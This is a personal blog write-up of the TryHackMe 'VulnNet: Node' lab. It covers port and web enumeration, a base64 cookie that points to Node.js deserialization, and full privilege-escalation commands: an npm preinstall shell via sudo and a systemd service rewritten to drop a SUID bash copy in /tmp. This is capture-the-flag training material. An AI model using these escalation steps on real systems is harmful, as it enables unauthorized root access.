GeorgeBanu
  • About me
  • Pentesting CheatSheets
    • Information Gathering
    • Ports Enumeration
      • FTP-21
      • SSH-22
      • Telnet-23
      • SMTP - 25,465,587
      • DNS-53
      • NetBIOS, SMB - 139,445
      • SNMP-161
      • MySQL-3306
      • RDP-3389
      • WinRM-5985
    • Web Cheat Sheet
    • Privilege Escalation
      • Linux Enumeration
      • Linux Privesc Techniques
    • Tricks
    • Template
  • TryHackMe Writeups
    • Starter
    • Dreaming
    • ColddBox: Easy
    • Ollie
    • Blog
    • KoTH Hackers
    • Brooklyn Nine Nine
    • Chill Hack
    • Undiscovered
    • Archangel
    • Jason
    • GLITCH
    • VulnNet: Node
    • Road
    • VulnNet:Internal
    • W1seGuy
  • CyberEDU Writeups
    • flag-is-hidden
    • file-crawler
    • reccon
    • this-file-hides-something
    • wifiland
    • old-tickets
    • inodat
    • pattern
    • ultra-crawl
  • eJPT
Powered by GitBook
On this page
  • Lab Setup
  • Enumeration
  • Privilege Escalation
  1. TryHackMe Writeups

VulnNet: Node

VulnNet Entertainment has moved its infrastructure and now they're confident that no breach will happen again. You're tasked to prove otherwise and penetrate their network.

PreviousGLITCHNextRoad

Last updated 1 year ago

Lab Setup

mkdir ~/Documents/tryhackme/vulnnet
cd  ~/Documents/tryhackme/vulnnet
mkdir recon enumeration notes
touch notes/{README.md,vuln,notes}

export IP=10.10.34.89

Enumeration

First of all, I scan the machine for open ports. I used rustscan to do that because it is faster than nmap and I can choose same options.

rustscan -a $IP --ulimit 5000 -- -sC -sV -A -T4

I've discovered that only port 8080 is open, indicating an HTTP service likely running on the Node.js framework in the background. Let's explore the website to uncover its contents. Typically, my initial step involves running a Nikto command, as it provides comprehensive insights but may take some time. In this time, I manually scan the website for default pages like robots.txt or sitemap.xml, aiming to find potentially interesting information such as user data, email addresses, or domain details.

nikto --host $URL -C all -o recon/nikto.txt

After this, I proceeded with fuzzing; however, even after changing the wordlist, I did not find any results.

feroxbuster -t 10 -u http://$IP -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -x py,html,txt -o enumeration/feroxbuster

In login page I tried some SQLinjection, but without results. At this step I was stuck, but after minutes I remember that I forget to check the cookie. It was in base64 encoding.

echo 'eyJ1c2VybmFtZSI6Ikd1ZXN0IiwiaXNHdWVzdCI6dHJ1ZSwiZW5jb2RpbmciOiAidXRmLTgifQ=='| base64 -d

{"username":"Guest","isGuest":true,"encoding": "utf-8"}

So this cookie seems to be exploitable. After I google it I found a few interesting blogs who explains very well how it works.

I used the script found in the blog above and customize it to get a reverse shell.

Privilege Escalation

Initially, I conducted user enumeration to determine available permissions. It was revealed that I had the capability to execute npm commands as another user. Consulting GTFobins, I sought methods to gain access as the "serve-manage" user.

TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
chmod 777 $TF
sudo -u serv-manage /usr/bin/npm -C $TF --unsafe-perm i

The user.txt flag can be found in home directory of serve-manage user. Now let's get root privilege.

I found that I can run system service as root, but before that needs to change the content of the vulnnet-auto.timer and vulnnet-job.service file.

  • vulnnet-auto.timer

[Unit]
Description=Run VulnNet utilities every 30 min

[Timer]
OnBootSec=0min
# 30 min job
OnCalendar=*:0/1
Unit=vulnnet-job.service

[Install]
WantedBy=basic.target

  • vulnnet-job.timer

[Unit]
Description=Logs system statistics to the systemd journal
Wants=vulnnet-auto.timer

[Service]
# Gather system statistics
Type=forking
ExecStart=/bin/bash -c 'cp /bin/bash /tmp/privesc;chmod +xs /tmp/privesc'

[Install]
WantedBy=multi-user.target

  • execute commands

sudo /bin/systemctl stop vulnnet-auto.timer
	
sudo /bin/systemctl daemon-reload
	
sudo /bin/systemctl start vulnnet-auto.timer
LogoExploiting Node.js deserialization bug for Remote Code ExecutionOpSecX
LogoNode.js Deserialization Attack | Exploit Noteshideckies